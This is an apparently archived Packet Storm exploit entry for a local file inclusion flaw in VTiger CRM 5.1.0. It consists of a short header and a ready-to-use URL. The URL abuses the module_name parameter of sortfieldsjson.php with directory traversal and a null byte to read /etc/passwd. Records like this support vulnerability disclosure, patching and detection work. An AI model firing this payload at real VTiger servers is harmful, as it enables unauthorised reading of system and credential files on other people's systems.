Vtiger 5.1.0 Local File Inclusion

2012-03-21T00:00:00
ID PACKETSTORM:111075
Type packetstorm
Reporter Pi3rrot
Modified 2012-03-21T00:00:00

Description

                                        
                                            `# Exploit Title: VTiger CRM  
# Google Dork: None  
# Date: 20/03/2012  
# Author: Pi3rrot  
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/  
# Version: 5.1.0  
# Tested on: CentOS 6  
# CVE : none  
We have find this vulnerabilitie in VTiger 5.1.0  
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php  
Try this :  
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00  
  
  
  
  
  
`